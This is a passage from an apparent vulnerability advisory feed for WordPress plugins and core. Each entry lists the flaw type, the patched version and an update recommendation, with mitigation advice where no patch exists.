Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: WP Job Board

Vulnerability: SQL Injection
Patched Version: 5.7.0
Recommended Action: Update to version 5.7.0, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.4
Recommended Action: Update to version 4.2.4, or a newer patched version

Plugin: Auto Thickbox Plus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form 7 Extension For Mailchimp

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SP Project & Document Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.26
Recommended Action: Update to version 4.26, or a newer patched version

Plugin: WP-DownloadManager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.68.7
Recommended Action: Update to version 1.68.7, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: WP-Members Membership Plugin

Vulnerability: Missing Authorization to Settings Update
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: WPGlobus Translate Options

Vulnerability: Reflected Cross-Site Scripting via page
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WP Webmaster

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.2.4
Recommended Action: Update to version 8.2.4, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels, Order Bumps & One Click Upsells

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.14.4
Recommended Action: Update to version 2.14.4, or a newer patched version

Plugin: Permalinks Customizer

Vulnerability: Cross-Site Request Forgery via post_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery and Stored Cross-Site Scripting
Patched Version: 2.0.52
Recommended Action: Update to version 2.0.52, or a newer patched version

Plugin: VR Calendar

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Category Meta plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – Commissions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Product Slider and Carousel with Category for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: WP Tabs – Responsive Tabs and Custom Product Tabs

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.17
Recommended Action: Update to version 2.1.17, or a newer patched version

Plugin: Knight Lab Timeline

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Horizontal scrolling announcement

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Cyberus Key

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘uid’ in ‘cyberkey_settings’ Plugin Setting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Easy Google Adsense and Banner Ads Manager – AdsforWP

Vulnerability: Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Advanced Contact form 7 DB

Vulnerability: SQL Injection
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Post and Page Builder by BoldGrid – Visual Drag and Drop Editor

Vulnerability: Cross-Site Request Forgery via submitDefaultEditor
Patched Version: 1.24.2
Recommended Action: Update to version 1.24.2, or a newer patched version

Plugin: Validated

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: GD Star Rating

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.17
Recommended Action: Update to version 1.9.17, or a newer patched version

Plugin: BePro Listings

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 2.2.0021
Recommended Action: Update to version 2.2.0021, or a newer patched version

Plugin: Tree Sitemap (Pages, Posts & Categories list)

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.50
Recommended Action: Update to version 2.9.50, or a newer patched version

Plugin: Custom Post View Generator

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Popups supercharged: Stunning templates for email, SMS, discount popups, product recommendation etc.

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Add Custom Post Type into Post Query

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Kali Forms <= 2.3.27
Patched Version: 2.3.28
Recommended Action: Update to version 2.3.28, or a newer patched version

Plugin: GoDaddy Email Marketing

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: TP Education

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcodes
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated (Admin+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 5.2.1.0
Recommended Action: Update to version 5.2.1.0, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Comments
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.13, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: Health Check & Troubleshooting

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Perfect Survey

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: wp-live-chat-support-pro

Vulnerability: Remote Code Execution via unrestricted file upload
Patched Version: 8.0.07
Recommended Action: Update to version 8.0.07, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Arbitrary File Upload
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: wp-mon

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CatalogX – Product Catalog Mode For WooCommerce

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WP-DownloadManager

Vulnerability: Server-Side Request Forgery
Patched Version: 1.68.5
Recommended Action: Update to version 1.68.5, or a newer patched version

Plugin: Easy Appointments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.11.1
Recommended Action: Update to version 3.11.1, or a newer patched version

Plugin: Custom Login Redirect

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Social Chat – Click To Chat App Button

Vulnerability: Administrator+ Stored Cross-Site Scripting
Patched Version: 6.0.5
Recommended Action: Update to version 6.0.5, or a newer patched version

Plugin: ArtPlacer Widget

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: 2.20.7
Recommended Action: Update to version 2.20.7, or a newer patched version

Plugin: Per page add to head

Vulnerability: No subtitle
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Row Seats Core

Vulnerability: PHP Object Injection
Patched Version: 2.68
Recommended Action: Update to version 2.68, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 5.9.5
Recommended Action: Update to version 5.9.5, or a newer patched version

Plugin: Ultimate WordPress Auction Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WooCommerce Subscription

Vulnerability: Missing Authorization
Patched Version: 5.8.0
Recommended Action: Update to version 5.8.0, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Facebook App ID
Patched Version: 1.3.2.3
Recommended Action: Update to version 1.3.2.3, or a newer patched version

Plugin: ShareYourCart

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: SQL Injection
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Chameleon CSS

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Page Builder

Vulnerability: Multiple Stored Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: UserHeat Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Canto

Vulnerability: Blind Server-Side Request Forgery via tree.php
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.8.29
Recommended Action: Update to version 2.8.29, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Profile Deletion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Pricing Tables For WPBakery Page Builder (formerly Visual Composer)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: WP Content Copy Protection & No Right Click

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Mmm Simple File List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Surfer – WordPress Plugin

Vulnerability: Missing Authorization
Patched Version: 1.3.3.379
Recommended Action: Update to version 1.3.3.379, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.2.41
Recommended Action: Update to version 2.2.41, or a newer patched version

Plugin: Import XML and RSS Feeds

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[browser_redirect][redirect_by_language]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: MainWP Comments Extension

Vulnerability: Missing Authorization
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: FAQ Builder AYS

Vulnerability: Blind SQL Injection
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Drop Shadow Boxes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.14
Recommended Action: Update to version 1.7.14, or a newer patched version

Plugin: Flower Delivery by Florist One

Vulnerability: (Admin+) Stored Cross-Site Scripting
Patched Version: 3.5.9
Recommended Action: Update to version 3.5.9, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service via wp-postpass cookie
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Contact Form 7 – PayPal & Stripe Add-on

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.4
Recommended Action: Update to version 1.9.4, or a newer patched version

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: Reflected Cross-Site Scripting via ‘filterType’
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Kento Post View Counter

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Rollback – Rollback Plugins and Themes

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.1.12
Recommended Action: Update to version 1.1.1.12, or a newer patched version

Plugin: Five Star Business Profile and Schema

Vulnerability: Subscriber+ Page Creation & Settings Update to Stored Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Carousel, Recent Post Slider and Banner Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Maintenance

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.03
Recommended Action: Update to version 4.03, or a newer patched version

Plugin: Popup Box: Create Popups Easily

Vulnerability: Authenticated Local File Inclusion
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 20.2.1
Recommended Action: Update to version 20.2.1, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.05.03
Recommended Action: Update to version 2.05.03, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.1
Recommended Action: Update to version 5.6.1, or a newer patched version

Plugin: PPWP – Password Protect Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: DW Promobar

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Membership Plugin <= 4.0.16
Patched Version: 4.0.17
Recommended Action: Update to version 4.0.17, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Sensitive Information Exposure
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: wordpress-backup-to-dropbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Mortgage Calculator / Loan Calculator

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.17
Recommended Action: Update to version 1.5.17, or a newer patched version

Plugin: Autolinks

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: File Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via file_gallery_shortcode
Patched Version: 1.8.5.4
Recommended Action: Update to version 1.8.5.4, or a newer patched version

Plugin: Elementor Addons, Widgets and Enhancements – Stax

Vulnerability: Cross-Site Request Forgery via toggle_widget
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Easy Coming Soon

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Pressference Exporter

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: wp-smiley

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: mTouch Quiz

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Auto Post, Auto Publish and Schedule to Twitter, LinkedIn and Social Media – WP to Buffer

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Team Members – A WordPress Team Plugin with Gallery, Grid, Carousel, Slider, Table, List, and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Olimometer

Vulnerability: SQL Injection
Patched Version: 2.57
Recommended Action: Update to version 2.57, or a newer patched version

Plugin: GD Rating System

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Sensei LMS – Online Courses, Quizzes, & Learning

Vulnerability: Missing Authorization
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Arbitrary Country Ban via Cross-Site Request Forgery
Patched Version: 2.26.6
Recommended Action: Update to version 2.26.6, or a newer patched version

Plugin: Counter Box: Add Engaging Countdowns, Timers & Counters to Your WordPress Site

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: iMember360is

Vulnerability: 3.9.001
Patched Version: 3.9.001
Recommended Action: Update to version 3.9.001, or a newer patched version

Plugin: Verse-O-Matic

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: SQL Injection
Patched Version: 8.0.0
Recommended Action: Update to version 8.0.0, or a newer patched version

Plugin: WordPress Sentinel

Vulnerability: SQL Injection
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WP Calendar

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: More Featured Images

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: rbxgallery

Vulnerability: Arbitrary File Upload
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: SiteAlert – Uptime, Speed, and Security Monitoring for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Accept Payments via PayPal

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.9.10
Recommended Action: Update to version 4.9.10, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Arbitrary File Upload
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WDContactFormBuilder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.69
Recommended Action: Update to version 1.0.69, or a newer patched version

Plugin: Smart Slider 3

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.5.1.11
Recommended Action: Update to version 3.5.1.11, or a newer patched version

Plugin: Manual Image Crop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: WP Ultimate Review

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: wordpress-admanager

Vulnerability: Open Redirection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CLUEVO LMS, E-Learning Platform

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Ajax Search Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.26.2
Recommended Action: Update to version 4.26.2, or a newer patched version

Plugin: Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages

Vulnerability: Open Redirect
Patched Version: 1.5.1.6
Recommended Action: Update to version 1.5.1.6, or a newer patched version

Plugin: AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress

Vulnerability: Open Redirect
Patched Version: 7.5.0
Recommended Action: Update to version 7.5.0, or a newer patched version

Plugin: Editorial Calendar, Marketing Content, Kanban Board – PublishPress Planner

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Local File Inclusion
Patched Version: 2.11.2
Recommended Action: Update to version 2.11.2, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Buy Me a Coffee – Button and Widget Plugin

Vulnerability: Missing Authorization
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Cross-Site Request Forgery to Plugin Language Translation Update
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 9.3.3
Recommended Action: Update to version 9.3.3, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: wp-forum

Vulnerability: Remote SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: youForms for WordPress – Creating Forms for CopeCart

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: AdServe

Vulnerability: SQL Injection
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Events Shortcodes For The Events Calendar

Vulnerability: Authenticated (Contributor+) SQL Injection via shortcode
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: PHP Object Injection
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Countdown and CountUp, WooCommerce Sales Timer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VK All in One Expansion Unit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.86.0.0
Recommended Action: Update to version 9.86.0.0, or a newer patched version

Plugin: Yoo Slider – Image Slider & Video Slider

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WooCommerce Amazon Affiliates

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 9.0.2.16
Recommended Action: Update to version 9.0.2.16, or a newer patched version

Plugin: Disqus Comment System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.76
Recommended Action: Update to version 2.76, or a newer patched version

Plugin: Calculated Fields Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.151
Recommended Action: Update to version 1.1.151, or a newer patched version

Plugin: Material Design Icons for Page Builders

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Modern Footnotes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.17
Recommended Action: Update to version 1.4.17, or a newer patched version

Plugin: twitter-liveblog

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GDMylist

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: External Media

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.36
Recommended Action: Update to version 1.0.36, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Glossary

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.28
Recommended Action: Update to version 2.1.28, or a newer patched version

Plugin: WolfNet IDX for WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
